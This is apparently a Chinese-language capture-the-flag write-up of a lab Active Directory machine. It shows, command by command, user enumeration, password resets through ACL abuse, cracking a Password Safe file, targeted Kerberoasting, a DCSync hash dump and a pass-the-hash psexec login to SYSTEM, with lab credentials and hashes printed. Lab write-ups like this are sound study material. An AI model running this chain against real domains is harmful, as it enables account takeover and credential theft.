Nmap Result
Not shown: 65509 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-16 20:34:54Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open unknown syn-ack ttl 127 49665/tcp open unknown syn-ack ttl 127 49666/tcp open unknown syn-ack ttl 127 49667/tcp open unknown syn-ack ttl 127 49668/tcp open unknown syn-ack ttl 127 57388/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 57399/tcp open unknown syn-ack ttl 127 57404/tcp open unknown syn-ack ttl 127 57415/tcp open unknown syn-ack ttl 127 57447/tcp open unknown syn-ack ttl 127 64600/tcp open unknown syn-ack ttl 127
Enumeration
Machine information 给出一个valid credential:
Username: Olivia Password: ichliebedich
首先尝试连接21/FTP端口,olivia和匿名登录均失败:
尝试用enum4linux和smbclient连接,但仍然失败. 但得知域名为Adiministrator:
使用kerbrute确认olivia是否为域内valid用户:
./kerbrute userenum -d administrator --dc 10.10.11.42 users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/19/25 - Ronnie Flathers @ropnop
2025/04/19 12:56:16 > Using KDC(s):
2025/04/19 12:56:16 > 10.10.11.42:88
2025/04/19 12:56:16 > [+] VALID USERNAME: olivia@administrator
2025/04/19 12:56:16 > Done! Tested 1 usernames (1 valid) in 0.007 seconds
得知olivia是域用户后,可以使用impacket-lookupsid来暴力枚举用户列表:
impacket-lookupsid 'Olivia'@10.10.11.42 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies Password: [*] Brute forcing SIDs at 10.10.11.42 [*] StringBinding ncacn_np:10.10.11.42[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-1088858960-373806567-254189436 498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: ADMINISTRATOR\Administrator (SidTypeUser) 501: ADMINISTRATOR\Guest (SidTypeUser) 502: ADMINISTRATOR\krbtgt (SidTypeUser) 512: ADMINISTRATOR\Domain Admins (SidTypeGroup) 513: ADMINISTRATOR\Domain Users (SidTypeGroup) 514: ADMINISTRATOR\Domain Guests (SidTypeGroup) 515: ADMINISTRATOR\Domain Computers (SidTypeGroup) 516: ADMINISTRATOR\Domain Controllers (SidTypeGroup) 517: ADMINISTRATOR\Cert Publishers (SidTypeAlias) 518: ADMINISTRATOR\Schema Admins (SidTypeGroup) 519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup) 520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup) 521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup) 522: ADMINISTRATOR\Cloneable Domain Controllers (SidTypeGroup) 525: ADMINISTRATOR\Protected Users (SidTypeGroup) 526: ADMINISTRATOR\Key Admins (SidTypeGroup) 527: ADMINISTRATOR\Enterprise Key Admins (SidTypeGroup) 553: ADMINISTRATOR\RAS and IAS Servers (SidTypeAlias) 571: ADMINISTRATOR\Allowed RODC Password Replication Group (SidTypeAlias) 572: ADMINISTRATOR\Denied RODC Password Replication Group (SidTypeAlias) 1000: ADMINISTRATOR\DC$ (SidTypeUser) 1101: ADMINISTRATOR\DnsAdmins (SidTypeAlias) 1102: ADMINISTRATOR\DnsUpdateProxy (SidTypeGroup) 1108: ADMINISTRATOR\olivia (SidTypeUser) 1109: ADMINISTRATOR\michael (SidTypeUser) 1110: ADMINISTRATOR\benjamin (SidTypeUser) 1111: ADMINISTRATOR\Share Moderators (SidTypeAlias) 1112: ADMINISTRATOR\emily (SidTypeUser) 1113: ADMINISTRATOR\ethan (SidTypeUser) 3601: ADMINISTRATOR\alexander (SidTypeUser) 3602: ADMINISTRATOR\emma (SidTypeUser)
至此,得到了一个用户列表:
olivia michael benjamin emily ethan alexander emma
如果在域环境内,用户没有开启kerberos pre-authentication,那么攻击者无需用户密码就可以获得用户的authentication-response,并尝试离线破解。impacket-GetNPUsers可以枚举有哪些用户没有开启此选项,并尝试获取AS-REP. 此攻击也被称为AS-REP Roasting. 尝试:
impacket-GetNPUsers -usersfile users -no-pass -dc-host administrator -dc-ip 10.10.11.42 administrator/ Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] User olivia doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User michael doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User benjamin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User emily doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ethan doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
没有用户设置了DONT_REQUIRE_PREAUTH. 但我们还有Olivia的密码,尝试用bloodhound-python远程获取域内结构:
bloodhound-python -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: administrator.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 11 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.administrator.htb INFO: Done in 00M 02S INFO: Compressing output into 20250419131421_bloodhound.zip
打开bloodhound并上传.
ACL Abuse
Olivia对用户Michael有GenericAll权限,Michael对Benjamin有ForceChangePassword权限,而Benjiamin属于组Share Moderators。
当一个用户A对另一个用户B有GenericAll权限时,则A可以对B:
- 修改密码
- 更改用户属性
- 添加用户到组
- 修改用户SPN - Targeted kerberoasting
当一个用户A对另一个用户B有ForceChangePassword权限时,则A可以强制修改B的密码。
尝试使用bloodyAD修改michael密码:
bloodyAD --host 10.10.11.42 -d administrator -u Olivia -p ichliebedich set password Michael 'Password123!' [+] Password changed successfully!
再以Michael的身份修改Benjamin的密码:
bloodyAD --host 10.10.11.42 -d administrator -u Michael -p Password123! set password Benjamin 'Password123!' [+] Password changed successfully!
根据Benjamin隶属的组名Share Moderators,猜测Benjamin应该有权限管理SMB share或者FTP,尝试登录这两个服务:
benjamin:Password123!登录FTP服务成功,并在目录下发现一个Backup.psafe3文件,下载下来。
没见过这个psafe3文件是什么,在网上搜索一番后得知, psafe3是一个保管密码的数据库,并且文件被一个master password加密:
可以使用我们万能的john来dump这个文件的master password,并尝试破解:
pwsafe2john Backup.psafe3 > pshash cat pshash Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050 john --wordlist=/usr/share/wordlists/rockyou.txt pshash Using default input encoding: UTF-8 Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x]) No password hashes left to crack (see FAQ) john --wordlist=/usr/share/wordlists/rockyou.txt pshash john --show pshash Backu:tekieromucho 1 password hash cracked, 0 left
得到密码,tekieromucho。使用pwsafe打开文件并输入密码:
登录后右键可以复制密码到粘贴板, 三人密码分别是:
Alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw Emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb Emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
在bloodhound里查看这三人分别有什么权限,发现Emily对Ethan有GenericWrite权限:
而Ethan对DC有DCSync权限:
- 当用户A对用户B有GenericWrite权限时,则A可以修改B的SPN属性,实施Targeted-kerberoasting Attack。
- 当用户A对DC有DCSync权限时,则A可以模拟域控制器向其他 DC 请求复制Password Hash,也就是可以发起 DCSync Attack,提取域内所有账户的 NTLM Hash.
使用targetedKerberoast对ethan发起攻击:
成功获取到了ethan的SPN。
PS:如果报错[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great),则是因为本机与DC之间的时间差过大,Kerberos认证对时间差要求非常严格。可以使用ntpdata ip来同步与DC的时间差。
PS:targetedKerberoast.py 跟impacket-GetUserSPNs功能大致一样,但它会尝试对可写入SPN的对象写入SPN属性后,再获取SPN。
用john破解ethan的SPN后获取密码:limpbizkit
因为ethan对DC有DCSync权限,则可以用Impacket-secresdump来直接dump域内密码:
impacket-secretsdump Administrator/ethan:'limpbizkit'@10.10.11.42 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::: administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::: administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: [*] Kerberos keys grabbed ....... [*] Cleaning up...
获取Administrator的NTLM hash,用impacket-psexec尝试登录:
impacket-psexec -hashes :3dc553ce4b9fd20bd016e098d2d2fd2e Administrator/Administrator@10.10.11.42 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.11.42..... [*] Found writable share ADMIN$ [*] Uploading file PPzOqLvu.exe [*] Opening SVCManager on 10.10.11.42..... [*] Creating service ecOM on 10.10.11.42..... [*] Starting service ecOM..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.20348.2762] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system
User and Root flags
在C:\Users\Emily\Desktop 下发现user flag:
在C:\users\Administrator\Desktop 下发现root flag:
Happy Hacking.
Comments NOTHING